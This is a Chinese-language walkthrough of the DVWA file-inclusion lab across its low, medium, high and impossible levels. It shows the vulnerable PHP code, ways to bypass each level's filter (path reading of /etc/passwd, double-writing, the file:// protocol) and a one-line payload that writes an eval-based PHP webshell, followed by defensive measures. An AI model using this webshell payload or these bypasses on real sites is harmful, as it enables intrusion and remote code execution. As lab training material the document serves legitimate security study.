File Inclusion 全级别
在此之前需要打开php响应配置
low级别
先查看一下代码:
<?php
$file = $_GET[ 'page' ];
?>
没有做任何的安全检查 page参数输入’/etc/passwd’,可以获取到网站目录在C:\phpstudy_pro\WWW\dvwa\vulnerabilities\fi\下 也可以输入phpinfo
当服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行。
可以通过fputs函数进行木马写入,写一个webshell.txt的文件
<?fputs(fopen("shell.php","w"),'<?php @eval($_POST[noc]);?>')?>
通过菜刀进行连接
medium级别
<?php
$file = $_GET[ 'page' ];
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
可以看到,str_replace函数对特殊字符进行了替换,但是可以通过双写或者大小写绕过 str_replace()函数对 …/ …\进行了替换,不能通过相对路径来获取相关信息,但是可以通过绝对路径获取。
high级别
<?php
$file = $_GET[ 'page' ];
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
echo "ERROR: File not found!";
exit;
}
?>
fnmatch() 函数根据指定的模式来匹配文件名或字符串。 可以通过file协议绕过
impossible级别
<?php
$file = $_GET[ 'page' ];
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
echo "ERROR: File not found!";
exit;
}
?>
简单粗暴的白名单保护法
文件包含漏洞的防护: 1、使用 str_replace 等方法过滤掉危险字符; 2、配置 open_basedir,防止目录遍历(open_basedir 将 php 所能打开的文件限制在指定的目录 树中); 3、php 版本升级,防止%00 截断; 4、对上传的文件进行重命名,防止被读取; 5、对于动态包含的文件可以设置一个白名单,不读取非白名单的文件; 6、做好管理员权限划分,做好文件的权限管理,allow_url_include 和 allow_url_fopen 最小权限化
|